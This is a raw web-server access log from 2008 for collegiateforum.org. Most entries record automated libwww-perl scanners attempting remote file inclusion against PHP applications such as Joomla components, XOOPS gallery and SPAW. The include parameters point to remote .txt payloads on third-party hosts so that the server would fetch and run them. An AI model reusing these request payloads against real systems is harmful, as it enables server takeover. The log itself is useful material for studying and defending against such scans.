64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:04:41 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:04:41 -0700] "GET /logs/access_080114.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:04:42 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:05:03 -0700] "GET /logs/access_080407.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:05:07 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:19:05:12 -0700] "GET /logs/access_080204.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:19:05:12 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:05:13 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:05:13 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:06:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:07:26 -0700] "GET /logs/access_080114.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:07:27 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:07:27 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:10:52 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:06 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:12:23 -0700] "GET /logs/access_080204.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:12:23 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:12:24 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:13:58 -0700] "GET /logs/access_080204.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:13:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:14:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.91.224.18 - - [10/Aug/2008:19:15:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.collegiateforum.org"
77.91.224.18 - - [10/Aug/2008:19:15:47 -0700] "GET / HTTP/1.1" 200 934 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:17:26 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:17:26 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:17:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:18:23 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:18:23 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:18:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
69.147.237.74 - - [10/Aug/2008:19:18:51 -0700] "GET /logs/access_080128.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:19:27 -0700] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:19:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:19:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:20:00 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:20:05 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:20:26 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:21:09 -0700] "GET /logs/access_080204.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:21:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:21:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:21:35 -0700] "GET /logs/access_080324.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:21:53 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:21:53 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:21:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:21:54 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:40 -0700] "GET /logs/access.log/index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:40 -0700] "GET /logs/index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:40 -0700] "GET /index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:50 -0700] "GET /index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:50 -0700] "GET /logs/access_080211.log/index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:22:51 -0700] "GET /logs/index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:22:54 -0700] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:22:54 -0700] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:22:55 -0700] "GET /logs/access.log%20/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:06 -0700] "GET /logs/access_080204.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:11 -0700] "GET /logs/access_080204.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:23:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:23:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:28 -0700] "GET /logs/access_080324.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:23:32 -0700] "GET /logs/access_080324.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:23:33 -0700] "GET /logs/access_080331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:23:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:23:34 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:19:24:52 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:19:24:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:19:24:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:24:59 -0700] "GET /logs/access.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:25:03 -0700] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:25:06 -0700] "GET /logs/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:25:21 -0700] "GET /logs/access_080324.log/oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:26:07 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:26:07 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:26:07 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:27:40 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:27:41 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:27:41 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:27:55 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
195.39.5.203 - - [10/Aug/2008:19:28:19 -0700] "GET /logs/access.log/index.php?redir=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:28:42 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:28:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:29:02 -0700] "GET /logs/access_080204.log/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:29:02 -0700] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:29:02 -0700] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:29:02 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:29:02 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:29:02 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:29:10 -0700] "GET /logs/access.log/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:29:11 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:29:12 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
